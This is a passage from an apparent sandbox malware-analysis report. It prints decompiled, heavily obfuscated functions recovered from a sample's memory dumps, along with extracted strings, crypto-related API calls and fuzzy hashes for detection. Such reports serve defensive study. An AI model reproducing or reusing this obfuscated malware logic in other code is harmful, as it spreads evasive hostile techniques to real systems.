				intOrPtr _t222;
				void* _t223;
				intOrPtr _t227;
				signed int* _t228;

				_t228 =  &_v84;
				_v8 = 0x71163c;
				_t222 = 0;
				_t193 = __edx;
				_v4 = 0;
				_v44 = 0xc562;
				_t227 = __ecx;
				_v44 = _v44 >> 2;
				_t223 = 0xa9ba57f;
				_v44 = _v44 ^ 0x8749252f;
				_v44 = _v44 ^ 0x87491d9f;
				_v16 = 0x2187;
				_v16 = _v16 + 0x9003;
				_v16 = _v16 ^ 0x00009583;
				_v64 = 0x884c;
				_v64 = _v64 ^ 0x157bb051;
				_t195 = 0x5b;
				_v64 = _v64 / _t195;
				_v64 = _v64 + 0xffffc6fd;
				_v64 = _v64 ^ 0x003c6beb;
				_v76 = 0xc2af;
				_t196 = 0x62;
				_v76 = _v76 / _t196;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0xffffe747;
				_v76 = _v76 ^ 0x000fbc5b;
				_v20 = 0xd86f;
				_v20 = _v20 << 0xb;
				_v20 = _v20 ^ 0x06c32379;
				_v24 = 0x5847;
				_v24 = _v24 ^ 0xbe016602;
				_v24 = _v24 ^ 0xbe0159ab;
				_v56 = 0x8b9e;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x62eb1469;
				_v56 = _v56 ^ 0x62609790;
				_v60 = 0xc8f5;
				_v60 = _v60 | 0xe944ef36;
				_v60 = _v60 ^ 0xbc6be2e2;
				_v60 = _v60 ^ 0x552f2627;
				_v84 = 0x43ed;
				_v84 = _v84 ^ 0x08a0b069;
				_v84 = _v84 | 0x0c951c83;
				_v84 = _v84 + 0x562e;
				_v84 = _v84 ^ 0x0cb6752c;
				_v48 = 0x4b81;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 + 0xffff2892;
				_v48 = _v48 ^ 0xffff31fe;
				_v80 = 0x3016;
				_v80 = _v80 + 0x7dde;
				_v80 = _v80 << 0xf;
				_t197 = 0x36;
				_v80 = _v80 / _t197;
				_v80 = _v80 ^ 0x019c7f33;
				_v52 = 0xfd2;
				_v52 = _v52 + 0xffff2d18;
				_v52 = _v52 + 0x6a3f;
				_v52 = _v52 ^ 0xffffabb5;
				_v28 = 0xa77b;
				_v28 = _v28 ^ 0xae749dbd;
				_v28 = _v28 ^ 0xae743f32;
				_v32 = 0xf75f;
				_v32 = _v32 | 0x58371397;
				_v32 = _v32 ^ 0x5837ee79;
				_v68 = 0x3d22;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 << 0xf;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x00007889;
				_v72 = 0xcbcf;
				_v72 = _v72 | 0x3a65856e;
				_v72 = _v72 + 0xdb4;
				_v72 = _v72 | 0x1789f940;
				_v72 = _v72 ^ 0x3feda3a8;
				_v36 = 0x2389;
				_v36 = _v36 * 0x4b;
				_v36 = _v36 | 0x61940fa3;
				_v36 = _v36 ^ 0x619e1b1f;
				_v40 = 0xa903;
				_v40 = _v40 + 0x4cf2;
				_v40 = _v40 | 0xc82713d6;
				_v40 = _v40 ^ 0xc827b671;
				_v12 = 0xc1c;
				_v12 = _v12 ^ 0x8bcf36f0;
				_v12 = _v12 ^ 0x8bcf5121;
				while(1) {
					L1:
					_t198 = 0x374e1c43;
					_t182 = 0x15aea868;
					L2:
					while(1) {
						do {
							if(_t223 == 0xa9ba57f) {
								_push(_t198);
								_push(_t198);
								_t199 = 0x38;
								_t222 = E00238736(_t199);
								__eflags = _t222;
								if(__eflags == 0) {
									_t223 = 0x3a1f14a3;
									_t182 = 0x15aea868;
									_t198 = 0x374e1c43;
									_t218 = 0x28fd42b4;
									goto L19;
								}
								_t223 = 0x2094e6da;
								L15:
								_t182 = 0x15aea868;
								L11:
								_t198 = 0x374e1c43;
								L12:
								_t218 = 0x28fd42b4;
								continue;
							}
							if(_t223 == 0xb1cacb5) {
								return E0023F536(_v36, _v40, _v12, _t222);
							}
							if(_t223 == _t182) {
								 *((intOrPtr*)(_t222 + 0x24)) = _t227;
								_t188 =  *0x24ca24; // 0x0
								 *((intOrPtr*)(_t222 + 0x2c)) = _t188;
								 *0x24ca24 = _t222;
								return _t188;
							}
							if(_t223 == 0x16c9d000) {
								E0024422C(_v68,  *((intOrPtr*)(_t222 + 0x28)), _v72);
								_t223 = 0xb1cacb5;
								goto L15;
							}
							if(_t223 == 0x2094e6da) {
								_push(_v24);
								_t190 = E00246DB9( *((intOrPtr*)(_t193 + 4)), _t222, _t227, __eflags, _t198,  *_t193, _v76, _v20);
								_t228 =  &(_t228[5]);
								 *((intOrPtr*)(_t222 + 0x28)) = _t190;
								__eflags = _t190;
								_t198 = 0x374e1c43;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x374e1c43 : 0xb1cacb5;
								goto L12;
							}
							if(_t223 == _t218) {
								_push(_t198);
								_t191 = E00231132(_v48, _t198, _v80, _t198, _t222, _v52, _v28, _v32, E00249586);
								_t228 =  &(_t228[9]);
								 *((intOrPtr*)(_t222 + 0x1c)) = _t191;
								__eflags = _t191;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x15aea868 : 0x16c9d000;
								goto L11;
							}
							if(_t223 != _t198) {
								goto L19;
							}
							_t192 = E002376DB( *((intOrPtr*)(_t222 + 0x28)), _v56, _v60, _v84);
							_t228 =  &(_t228[2]);
							 *((intOrPtr*)(_t222 + 4)) = _t192;
							_t218 = 0x28fd42b4;
							_t223 =  !=  ? 0x28fd42b4 : 0x16c9d000;
							goto L1;
							L19:
							__eflags = _t223 - 0x3a1f14a3;
						} while (__eflags != 0);
						return _t182;
					}
				}
			}

0x002369a0
0x002369a3
0x002369af
0x002369b1
0x002369b3
0x002369b9
0x002369c1
0x002369c3
0x002369c8
0x002369cd
0x002369d5
0x002369dd
0x002369e5
0x002369ed
0x002369f5
0x002369fd
0x00236a0b
0x00236a10
0x00236a16
0x00236a1e
0x00236a26
0x00236a32
0x00236a37
0x00236a3d
0x00236a42
0x00236a4a
0x00236a52
0x00236a5a
0x00236a5f
0x00236a67
0x00236a6f
0x00236a77
0x00236a7f
0x00236a87
0x00236a8c
0x00236a94
0x00236a9c
0x00236aa4
0x00236aac
0x00236ab4
0x00236abc
0x00236ac4
0x00236acc
0x00236ad4
0x00236adc
0x00236ae4
0x00236aec
0x00236af1
0x00236af9
0x00236b01
0x00236b09
0x00236b11
0x00236b1a
0x00236b1d
0x00236b21
0x00236b29
0x00236b31
0x00236b39
0x00236b41
0x00236b49
0x00236b51
0x00236b59
0x00236b61
0x00236b69
0x00236b71
0x00236b79
0x00236b81
0x00236b8b
0x00236b90
0x00236b95
0x00236b9d
0x00236ba5
0x00236bad
0x00236bb5
0x00236bbd
0x00236bc5
0x00236bd2
0x00236bd6
0x00236bde
0x00236be6
0x00236bee
0x00236bf6
0x00236bfe
0x00236c06
0x00236c0e
0x00236c16
0x00236c1e
0x00236c1e
0x00236c1e
0x00236c23
0x00000000
0x00236c28
0x00236c28
0x00236c2e
0x00236d35
0x00236d36
0x00236d39
0x00236d3f
0x00236d43
0x00236d45
0x00236d4e
0x00236d53
0x00236d58
0x00236d5d
0x00000000
0x00236d5d
0x00236d47
0x00236d22
0x00236d22
0x00236cca
0x00236cca
0x00236ccf
0x00236ccf
0x00000000
0x00236ccf
0x00236c3a
0x00000000
0x00236d96
0x00236c42
0x00236d70
0x00236d73
0x00236d78
0x00236d7b
0x00000000
0x00236d7b
0x00236c4e
0x00236d17
0x00236d1d
0x00000000
0x00236d1d
0x00236c5a
0x00236cd9
0x00236ceb
0x00236cf0
0x00236cf3
0x00236cf6
0x00236cfd
0x00236d02
0x00236d07
0x00000000
0x00236d07
0x00236c5e
0x00236c93
0x00236cb0
0x00236cb5
0x00236cb8
0x00236cbb
0x00236cc2
0x00236cc7
0x00000000
0x00236cc7
0x00236c62
0x00000000
0x00000000
0x00236c77
0x00236c7c
0x00236c7f
0x00236c89
0x00236c8e
0x00000000
0x00236d62
0x00236d62
0x00236d62
0x00000000
0x00236c28
0x00236c28

Strings

.V, xrefs: 00236AD4
'&/U, xrefs: 00236AB4
k<, xrefs: 00236A1E
"=, xrefs: 00236B79
?j, xrefs: 00236B39
y7X, xrefs: 00236B71
GX, xrefs: 00236A67

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "=$'&/U$.V$?j$GX$y7X$k<
API String ID: 0-2482092835
Opcode ID: ca5628ad3bb111046fd6c74fa9a90bf973a19b33518606bf6bcf2b320ef3f076
Instruction ID: 432e12e82c7949babc6f175744fb818aabc46917c1141e8a05bf98bf4cf31fd7
Opcode Fuzzy Hash: ca5628ad3bb111046fd6c74fa9a90bf973a19b33518606bf6bcf2b320ef3f076
Instruction Fuzzy Hash: E8A174B2528341AFD358CF25C58A40BFBE1FBD4754F508A1DF48A96260D7B5C919CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00231280, Relevance: 7.7, Strings: 6, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00231280(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t124;
				void* _t136;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				void* _t149;
				void* _t170;
				void* _t172;
				void* _t173;

				_push(_a16);
				_t169 = _a8;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t124);
				_v112 = 0x527a;
				_t173 = _t172 + 0x18;
				_v112 = _v112 + 0x9ab3;
				_t170 = 0;
				_t149 = 0x18640a1d;
				_t144 = 0x56;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x0028d5a0;
				_v84 = 0xce56;
				_v84 = _v84 | 0x89224a79;
				_v84 = _v84 ^ 0x8922db02;
				_v124 = 0x8cd1;
				_v124 = _v124 ^ 0x879587c2;
				_v124 = _v124 | 0xdff4f7f6;
				_v124 = _v124 ^ 0xdff58592;
				_v80 = 0x5082;
				_v80 = _v80 * 5;
				_v80 = _v80 ^ 0x0001dd7a;
				_v100 = 0x94cc;
				_v100 = _v100 >> 1;
				_v100 = _v100 + 0xc5d3;
				_v100 = _v100 ^ 0x0001674a;
				_v104 = 0x7528;
				_v104 = _v104 | 0x4afc80c9;
				_v104 = _v104 * 0x41;
				_v104 = _v104 ^ 0x0a3a6635;
				_v108 = 0x5a30;
				_v108 = _v108 >> 6;
				_t145 = 0x51;
				_v108 = _v108 / _t144;
				_v108 = _v108 ^ 0x00000b43;
				_v128 = 0x7a75;
				_v128 = _v128 ^ 0x183e3e2b;
				_v128 = _v128 >> 0xe;
				_v128 = _v128 << 1;
				_v128 = _v128 ^ 0x0000b567;
				_v88 = 0xd0b6;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0x0003606d;
				_v92 = 0x29e5;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0x29e559c0;
				_v116 = 0xa20c;
				_v116 = _v116 / _t145;
				_v116 = _v116 << 1;
				_v116 = _v116 ^ 0x00003b63;
				_v120 = 0xbe93;
				_v120 = _v120 | 0x1a4ed6db;
				_v120 = _v120 + 0xa009;
				_v120 = _v120 + 0xfffff07c;
				_v120 = _v120 ^ 0x1a4feb5f;
				_v96 = 0x4975;
				_t146 = 0x2b;
				_v96 = _v96 * 0x31;
				_v96 = _v96 / _t146;
				_v96 = _v96 ^ 0x000025f7;
				do {
					while(_t149 != 0x1a9c3b7) {
						if(_t149 == 0xb87d72f) {
							__eflags = E0023B055(_v120, _v96, __eflags,  &_v76, _t169 + 8);
							_t170 =  !=  ? 1 : _t170;
						} else {
							if(_t149 == 0x18640a1d) {
								_t149 = 0x1a19e858;
								continue;
							} else {
								if(_t149 == 0x1a19e858) {
									E002450F2( &_v76, _v112, _v84, _v124, _a12);
									_t173 = _t173 + 0xc;
									_t149 = 0x1a9c3b7;
									continue;
								} else {
									if(_t149 != 0x2b3c78b1) {
										goto L13;
									} else {
										_t143 = E00248F11( &_v76, _v128, _v88, _t169 + 4, _v92, _v116);
										_t173 = _t173 + 0x10;
										if(_t143 != 0) {
											_t149 = 0xb87d72f;
											continue;
										}
									}
								}
							}
						}
						L16:
						return _t170;
					}
					_t136 = E00248F11( &_v76, _v80, _v100, _t169, _v104, _v108);
					_t173 = _t173 + 0x10;
					__eflags = _t136;
					if(__eflags == 0) {
						_t149 = 0x1a747795;
						goto L13;
					} else {
						_t149 = 0x2b3c78b1;
						continue;
					}
					goto L16;
					L13:
					__eflags = _t149 - 0x1a747795;
				} while (__eflags != 0);
				goto L16;
			}

0x0023128a
0x00231291
0x00231298
0x0023129f
0x002312a0
0x002312a7
0x002312a8
0x002312a9
0x002312ae
0x002312b6
0x002312b9
0x002312c8
0x002312ca
0x002312d1
0x002312d4
0x002312d8
0x002312e0
0x002312e8
0x002312f0
0x002312f8
0x00231300
0x00231308
0x00231310
0x00231318
0x00231325
0x00231329
0x00231331
0x00231339
0x0023133d
0x00231345
0x0023134d
0x00231355
0x00231362
0x00231366
0x0023136e
0x00231376
0x00231381
0x00231382
0x00231388
0x00231390
0x00231398
0x002313a0
0x002313a5
0x002313a9
0x002313b1
0x002313b9
0x002313be
0x002313c6
0x002313ce
0x002313d3
0x002313db
0x002313eb
0x002313ef
0x002313f3
0x002313fb
0x00231403
0x0023140b
0x00231413
0x0023141b
0x00231423
0x00231432
0x00231433
0x00231447
0x0023144b
0x00231453
0x00231453
0x0023145d
0x0023152a
0x0023152c
0x00231463
0x00231469
0x002314cd
0x00000000
0x0023146b
0x0023146d
0x002314be
0x002314c3
0x002314c6
0x00000000
0x0023146f
0x00231475
0x00000000
0x0023147b
0x00231493
0x00231498
0x0023149d
0x002314a3
0x00000000
0x002314a3
0x0023149d
0x00231475
0x0023146d
0x00231469
0x00231530
0x0023153b
0x0023153b
0x002314e6
0x002314eb
0x002314ee
0x002314f0
0x002314fc
0x00000000
0x002314f2
0x002314f2
0x00000000
0x002314f2
0x00000000
0x00231501
0x00231501
0x00231501
0x00000000

Strings

zR, xrefs: 002312AE
0Z, xrefs: 0023136E
c;, xrefs: 002313F3
5f:, xrefs: 00231366
uI, xrefs: 00231423
uz, xrefs: 00231390

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 0Z$5f:$c;$uI$uz$zR
API String ID: 0-4070947617
Opcode ID: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
Instruction ID: 14e3f2a68fbbba4ff3f09a31d1960bb7da5a8a6a525d4934ed443a0206307409
Opcode Fuzzy Hash: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
Instruction Fuzzy Hash: AB6156B1119341AFD758CF20C98591FBBE1FBC9748F80991DF296861A0D7B9CA188F43

Uniqueness

Uniqueness Score: -1.00%

Function 002317AC, Relevance: 7.7, Strings: 6, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E002317AC(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* __ecx;
				void* _t124;
				intOrPtr _t144;
				void* _t148;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				signed int* _t175;

				_push(_a20);
				_push(1);
				_push(1);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0023602B(_t124);
				_v48 = 0x839b;
				_t175 =  &(( &_v52)[7]);
				_t172 = 0;
				_t148 = 0xc9f1fee;
				_t167 = 0x65;
				_v48 = _v48 / _t167;
				_v48 = _v48 + 0xffff5433;
				_t168 = 0x4c;
				_v48 = _v48 / _t168;
				_v48 = _v48 ^ 0x035e614e;
				_v52 = 0x7a24;
				_t169 = 0x57;
				_v52 = _v52 * 0x3d;
				_v52 = _v52 / _t169;
				_v52 = _v52 | 0x143fc393;
				_v52 = _v52 ^ 0x143ff5ea;
				_v32 = 0x6195;
				_v32 = _v32 ^ 0x160f1dee;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x2c1ed936;
				_v44 = 0xc7f4;
				_v44 = _v44 + 0xffff31e5;
				_v44 = _v44 | 0xcdfc86d8;
				_v44 = _v44 + 0xffff4cbe;
				_v44 = _v44 ^ 0xffff1878;
				_v12 = 0x3e0d;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x0003ab13;
				_v24 = 0xe2a2;
				_t170 = 0x4a;
				_v24 = _v24 * 0x7d;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0006fa2b;
				_v16 = 0xd6eb;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x0000394e;
				_v40 = 0x5ece;
				_v40 = _v40 * 0x43;
				_v40 = _v40 / _t170;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0x000003d1;
				_v28 = 0xdfec;
				_v28 = _v28 >> 6;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x001be0b4;
				_v20 = 0x73b;
				_v20 = _v20 ^ 0xd6615083;
				_v20 = _v20 ^ 0xd6610707;
				_v36 = 0x46b8;
				_v36 = _v36 | 0xf1966772;
				_v36 = _v36 ^ 0x374c3a36;
				_v36 = _v36 * 0x27;
				_v36 = _v36 ^ 0x4b440184;
				_v8 = 0xd697;
				_v8 = _v8 ^ 0x6f8084df;
				_v8 = _v8 ^ 0x6f807f26;
				_t171 = _v4;
				while(_t148 != 0x24e4c4b) {
					if(_t148 == 0xc9f1fee) {
						_t148 = 0x3ad8e818;
						continue;
					} else {
						if(_t148 == 0x1ffca7a2) {
							E00241AB6(1, _v12, _t148, _a20, 1, _v24, _v16, _v4, _a4, _v40, _v28, _v20);
							_t175 =  &(_t175[0xa]);
							_t148 = 0x24e4c4b;
							_t172 =  !=  ? 1 : _t172;
							continue;
						} else {
							if(_t148 == 0x34494570) {
								if(E00240729(_v32,  &_v4, _v44, _t171) != 0) {
									_t148 = 0x1ffca7a2;
									continue;
								}
							} else {
								if(_t148 != 0x3ad8e818) {
									L13:
									if(_t148 != 0x2a0664e6) {
										continue;
									}
								} else {
									_t144 = E0023F6DF(_t148);
									_t171 = _t144;
									if(_t144 != 0xffffffff) {
										_t148 = 0x34494570;
										continue;
									}
								}
							}
						}
					}
					return _t172;
				}
				E00244F7D(_v36, _v8, _v4);
				_t148 = 0x2a0664e6;
				goto L13;
			}

0x002317b3
0x002317ba
0x002317bb
0x002317bc
0x002317c0
0x002317c4
0x002317c6
0x002317cb
0x002317d3
0x002317dc
0x002317de
0x002317e5
0x002317ea
0x002317f0
0x002317fc
0x00231801
0x00231807
0x0023180f
0x0023181c
0x0023181f
0x0023182b
0x0023182f
0x00231837
0x0023183f
0x00231847
0x0023184f
0x00231853
0x0023185b
0x00231863
0x0023186b
0x00231873
0x0023187b
0x00231883
0x0023188b
0x00231890
0x00231898
0x002318a5
0x002318a6
0x002318aa
0x002318af
0x002318b7
0x002318bf
0x002318c4
0x002318cc
0x002318d9
0x002318e3
0x002318e7
0x002318ec
0x002318f4
0x002318fc
0x00231901
0x00231906
0x0023190e
0x00231916
0x0023191e
0x00231926
0x00231933
0x0023193b
0x00231948
0x0023194c
0x00231954
0x0023195c
0x00231964
0x0023196c
0x00231970
0x00231982
0x00231a1a
0x00000000
0x00231988
0x0023198a
0x00231a03
0x00231a08
0x00231a0b
0x00231a12
0x00000000
0x0023198c
0x00231992
0x002319d5
0x002319d7
0x00000000
0x002319d7
0x00231994
0x0023199a
0x00231a3b
0x00231a41
0x00000000
0x00000000
0x002319a0
0x002319a8
0x002319ad
0x002319b2
0x002319b8
0x00000000
0x002319b8
0x002319b2
0x0023199a
0x00231992
0x0023198a
0x00231a50
0x00231a50
0x00231a30
0x00231a36
0x00000000

Strings

6:L7, xrefs: 0023193B
>, xrefs: 00231883
pEI4, xrefs: 002319B8
pEI4, xrefs: 0023198C
$z, xrefs: 0023180F
N9, xrefs: 002318C4

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: >$$z$6:L7$N9$pEI4$pEI4
API String ID: 0-302225334
Opcode ID: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
Instruction ID: 264d070849df8c1b975648e5a33df35598f3db68e84b70a681082842ca8b208f
Opcode Fuzzy Hash: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
Instruction Fuzzy Hash: 1C6163B11183419FD348CE65D88581FBBE5BFC8358F404A1EF196962A0C3B5CA6ACF83

Uniqueness

Uniqueness Score: -1.00%

Function 002420C5, Relevance: 7.6, Strings: 6, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002420C5() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				void* _t124;
				short* _t127;
				void* _t132;
				void* _t134;
				intOrPtr _t150;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t167;
				void* _t169;

				_t169 = (_t167 & 0xfffffff8) - 0x250;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t132 = 0x3ec8c14;
				_v536 = 0x37230;
				_v544 = 0xcdd0;
				_v544 = _v544 >> 7;
				_v544 = _v544 ^ 0x000074a7;
				_v572 = 0xb951;
				_v572 = _v572 + 0xffffa9df;
				_v572 = _v572 ^ 0x00005eca;
				_v584 = 0x3783;
				_v584 = _v584 >> 1;
				_t159 = 0x30;
				_v584 = _v584 / _t159;
				_v584 = _v584 ^ 0x00007df0;
				_v592 = 0x764f;
				_t160 = 0x29;
				_v592 = _v592 * 0x6c;
				_v592 = _v592 + 0xffff1483;
				_v592 = _v592 ^ 0x0030effe;
				_v580 = 0x26e4;
				_v580 = _v580 + 0xffffa17d;
				_v580 = _v580 >> 0xc;
				_v580 = _v580 ^ 0x000fb6a3;
				_v588 = 0x592d;
				_v588 = _v588 * 0x5e;
				_v588 = _v588 + 0xfffff058;
				_v588 = _v588 ^ 0x0020c0b6;
				_v576 = 0x67c6;
				_v576 = _v576 >> 4;
				_v576 = _v576 | 0x70f0481f;
				_v576 = _v576 ^ 0x70f020ed;
				_v568 = 0x5c9a;
				_v568 = _v568 ^ 0x6d262440;
				_v568 = _v568 ^ 0x6d2624e4;
				_v552 = 0x512d;
				_v552 = _v552 / _t160;
				_v552 = _v552 ^ 0x00002fd7;
				_v540 = 0x67a3;
				_v540 = _v540 + 0x741c;
				_v540 = _v540 ^ 0x0000c39d;
				_v560 = 0xac4b;
				_v560 = _v560 | 0x611015d1;
				_v560 = _v560 ^ 0x6110f087;
				_v548 = 0xff97;
				_v548 = _v548 >> 8;
				_v548 = _v548 ^ 0x000016db;
				_v556 = 0xce04;
				_t161 = 0x2b;
				_v556 = _v556 / _t161;
				_v556 = _v556 ^ 0x000048b5;
				_v564 = 0x85d6;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 ^ 0x00007642;
				do {
					while(_t132 != 0x3ec8c14) {
						if(_t132 == 0x4e3e716) {
							_push(_v572);
							_t124 = E0024889D(0x24c9b0, _v544, __eflags);
							_pop(_t134);
							_t150 =  *0x24ca2c; // 0x5d8300
							_t108 = _t150 + 0x230; // 0x7a0056
							E0023C680(_t108, _v592, _v580, _t134, _v588,  *0x24ca2c, _t124,  &_v524);
							_t169 = _t169 + 0x1c;
							_t127 = E00242025(_v576, _t124, _v568, _v552);
							_t132 = 0x36d909ae;
							continue;
						} else {
							if(_t132 == 0x2942dba3) {
								_t127 = E00242B16(_v548,  &_v524, E002484CC, _v564, 0,  &_v524);
							} else {
								if(_t132 != 0x36d909ae) {
									goto L8;
								} else {
									_t127 = E002328CE( &_v524, _v540, _v560);
									 *_t127 = 0;
									_t132 = 0x2942dba3;
									continue;
								}
							}
						}
						L11:
						return _t127;
					}
					_t132 = 0x4e3e716;
					L8:
					__eflags = _t132 - 0x16e8989b;
				} while (__eflags != 0);
				goto L11;
			}

0x002420cb
0x002420d1
0x002420d8
0x002420dd
0x002420e2
0x002420ea
0x002420f2
0x002420f7
0x002420ff
0x00242107
0x0024210f
0x00242117
0x0024211f
0x0024212d
0x00242132
0x00242138
0x00242145
0x0024215c
0x0024215f
0x00242163
0x0024216b
0x00242173
0x0024217b
0x00242183
0x00242188
0x00242190
0x0024219d
0x002421a1
0x002421a9
0x002421b1
0x002421b9
0x002421be
0x002421c6
0x002421ce
0x002421d6
0x002421de
0x002421e6
0x002421f6
0x002421fa
0x00242202
0x0024220a
0x00242212
0x0024221a
0x00242222
0x0024222a
0x00242232
0x0024223a
0x0024223f
0x00242247
0x00242253
0x00242256
0x0024225a
0x00242262
0x0024226a
0x0024226f
0x00242277
0x00242277
0x00242285
0x002422ae
0x002422bb
0x002422c0
0x002422dc
0x002422e6
0x002422ec
0x002422f1
0x00242302
0x00242309
0x00000000
0x00242287
0x00242289
0x00242339
0x0024228f
0x00242291
0x00000000
0x00242293
0x0024229f
0x002422a7
0x002422aa
0x00000000
0x002422aa
0x00242291
0x00242289
0x00242341
0x00242348
0x00242348
0x00242310
0x00242312
0x00242312
0x00242312
0x00000000

Strings

-Q, xrefs: 002421E6
Ov, xrefs: 00242145
&, xrefs: 00242173
$&m, xrefs: 002421DE
Bv, xrefs: 0024226F
-Y, xrefs: 00242190

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: -Q$-Y$Bv$Ov$$&m$&
API String ID: 0-2434786051
Opcode ID: 190095b375f8a9e8f5931243a11a7ef555f847ccc54168a8f8c5417840ecaf4c
Instruction ID: c6c1dbc34df42e263c4c7a55ed743f158a6199bc5e193a4933f0676fcd8ecc2c
Opcode Fuzzy Hash: 190095b375f8a9e8f5931243a11a7ef555f847ccc54168a8f8c5417840ecaf4c
Instruction Fuzzy Hash: 2E516771118341AFD368CF25C88A91BBBF1FBC4368F509A1DF585862A0C7B58959CF86

Uniqueness

Uniqueness Score: -1.00%

Function 100021F0, Relevance: 7.6, APIs: 5, Instructions: 67encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
CoTaskMemAlloc.OLE32(?), ref: 10002227
CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
CoTaskMemFree.OLE32(00000000), ref: 1000227A

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: BinaryCryptStringTask$AllocDeserializeFreePropVariant
String ID:
API String ID: 2967290590-0
Opcode ID: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
Instruction ID: 3bbe9fb0322c03d3a19eaaaaa04faf6b757ff22615bcfcbc1accf4c01beb8128
Opcode Fuzzy Hash: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
Instruction Fuzzy Hash: 51116D3AA01129BBEB10DBD48C44FDE77FCDB457A1F010266FE05E2154DA719A408AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00236754, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00236754(intOrPtr __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				unsigned int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				void* _t96;
				signed int _t97;
				signed int _t101;
				intOrPtr _t104;
				signed int _t106;
				signed int _t107;
				void* _t108;
				signed int _t123;
				void* _t124;
				intOrPtr* _t128;
				signed int* _t129;

